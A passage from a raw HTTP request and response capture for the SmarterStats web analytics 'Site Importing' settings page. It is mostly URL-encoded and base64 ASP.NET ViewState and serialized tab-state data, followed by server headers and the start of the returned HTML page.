XJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAEEBJbXBvcnRGaWx0ZXJpbmcB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAABJJbXBvcnRGaWx0ZXJpbmdUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTIPMt4LAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAxASWdub3JlSXRlbXMB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAAA5JZ25vcmVJdGVtc1RhYgtkBRljdGwwMCRNUEgkZ3JkRHluYW1pY1BhZ2VzDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUaY3RsMDAkTVBIJGdyZEltcG9ydEZpbHRlcnMPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtNA8y4AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAADUBEeW5hbWljUGFnZXMB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAAA9EeW5hbWljUGFnZXNUYWILZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFImN0bDAwJE1QSCRjaGtTdHJpcFVSTF9TZXR0aW5nQ2hlY2tUiQz6CSndQahG8oOmCFgtj3L26wUhVeXrF8CicWwtZg%3d%3d&ctl00_MPH_grdDynamicPages_HiddenInput=&ctl00%24MPH%24txtQueryStringItemsToIgnore_SettingText=%0d%0a&ctl00%24MPH%24lstTimeZone_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00_MPH_grdDynamicPages_HiddenLSR=

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:18 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41960
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Site Importing - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmImportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzE4NjgzMDgPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIFD2QWBAICD2QWAgIBD2QWBGYPZBYCAgEPZBYCAgIPDxYCHwRlZGQCAQ9kFgICAQ9kFgJmDxBkDxZXZgIBAgICAwIEAgUCBgIHAggCCQIKAgsCDAINAg4CDwIQAhECEgITAhQCFQIWAhcCGAIZAhoCGwIcAh0CHgIfAiACIQIiAiMCJAIlAiYCJwIoAikCKgIrAiwCLQIuAi8CMAIxAjICMwI0AjUCNgI3AjgCOQI6AjsCPAI9Aj4CPwJAAkECQgJDAkQCRQJGAkcCSAJJAkoCSwJMAk0CTgJPAlACUQJSAlMCVAJVAlYWVxAFKChHTVQtMTI6MDApIEludGVybmF0aW9uYWwgRGF0ZSBMaW5lIFdlc3QFATBnEAUgKEdNVC0xMTowMCkgTWlkd2F5IElzbGFuZCwgU2Ftb2EFATFnEAUSKEdNVC0xMDowMCkgSGF3YWlpBQEyZxAFEihHTVQtMDk6MDApIEFsYXNrYQUBM2cQBSQoR01ULTA4OjAwKSBUaWp1YW5hLCBCYWphIENhbGlmb3JuaWEFCy0yMTQ3NDgzNTc5ZxAFJihHTVQtMDg6MDApIFBhY2lmaWMgVGltZSAoVVMgJiBDYW5hZGEpBQE0ZxAFLShHTVQtMDc6MDApIENoaWh1YWh1YSwgTGEgUGF6LCBNYXphdGxhbiAtIE5ldwULLTIxNDc0ODM1ODBnEAUnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpBQIxMGcQBRMoR01ULTA3OjAwKSBBcml6b25hBQIxNWcQBS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBPbGQFAjEzZxAFGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbgUCMjVnEAU1KEdNVC0wNjowMCkgR3VhZGFsYWphcmEsIE1leGljbyBDaXR5LCBNb250ZXJyZXkgLSBPbGQFAjMwZxAFJihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEpBQIyMGcQBTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldwULLTIxNDc0ODM1ODFnEAUbKEdNVC0wNjowMCkgQ2VudHJhbCBBbWVyaWNhBQIzM2cQBSYoR01ULTA1OjAwKSBFYXN0ZXJuIFRpbWUgKFVTICYgQ2FuYWRhKQUCMzVnEAUaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkFAjQwZxAFKyhHTVQtMDU6MDApIEJvZ290YSwgTGltYSwgUXVpdG8sIFJpbyBCcmFuY28FAjQ1ZxAFEyhHTVQtMDQ6MzApIENhcmFjYXMFCy0yMTQ3NDgzNTczZxAFEihHTVQtMDQ6MDApIE1hbmF1cwULLTIxNDc0ODM1NzZnEAUiKEdNVC0wNDowMCkgQXRsYW50aWMgVGltZSAoQ2FuYWRhKQUCNTBnEAUSKEdNVC0wNDowMCkgTGEgUGF6BQI1NWcQBRQoR01ULTA0OjAwKSBTYW50aWFnbwUCNTZnEAUYKEdNVC0wMzozMCkgTmV3Zm91bmRsYW5kBQI2MGcQBSQoR01ULTAzOjAwKSBCdWVub3MgQWlyZXMsIEdlb3JnZXRvd24FAjcwZxAFFShHTVQtMDM6MDApIEdyZWVubGFuZAUCNzNnEAUUKEdNVC0wMzowMCkgQnJhc2lsaWEFAjY1ZxAFFihHTVQtMDM6MDApIE1vbnRldmlkZW8FCy0yMTQ3NDgzNTc1ZxAFGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYwUCNzVnEAUSKEdNVC0wMTowMCkgQXpvcmVzBQI4MGcQBRooR01ULTAxOjAwKSBDYXBlIFZlcmRlIElzLgUCODNnEAUlKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpawUCOTBnEAU9KEdNVCkgR3JlZW53aWNoIE1lYW4gVGltZSA6IER1YmxpbiwgRWRpbmJ1cmdoLCBMaXNib24sIExvbmRvbgUCODVnEAU9KEdNVCswMTowMCkgQmVsZ3JhZGUsIEJyYXRpc2xhdmEsIEJ1ZGFwZXN0LCBManVibGph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KSBWbGFkaXZvc3RvawUDMjcwZxAFFChHTVQrMTA6MDApIEJyaXNiYW5lBQMyNjBnEAUSKEdNVCsxMDowMCkgSG9iYXJ0BQMyNjVnEAUvKEdNVCsxMTowMCkgTWFnYWRhbiwgU29sb21vbiBJcy4sIE5ldyBDYWxlZG9uaWEFAzI4MGcQBSkoR01UKzEyOjAwKSBGaWppLCBLYW1jaGF0a2EsIE1hcnNoYWxsIElzLgUDMjg1ZxAFIChHTVQrMTI6MDApIEF1Y2tsYW5kLCBXZWxsaW5ndG9uBQMyOTBnEAUWKEdNVCsxMzowMCkgTnVrdSdhbG9mYQUDMzAwZ2RkAgQPZBYEAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfBGVkZAIFD2QWAmYPZBYCAgEPZBYCZg8QDxYCHwQFQUVuYWJsZSByZW1vdmFsIG9mIFVSTCBpdGVtcyBhZnRlciBzZW1pY29sb24gKHVzZWQgZm9yIGpzZXNzaW9uaWQpZGRkZBgIBRljdGwwMCRUUEgkUGFnZUlkZW50aWZpZXIxDwUgNWJiNDkzODBlMzhmNGUzOTkxMTc1Y2RjY2MxOWY5OTRkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMw8y5gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5A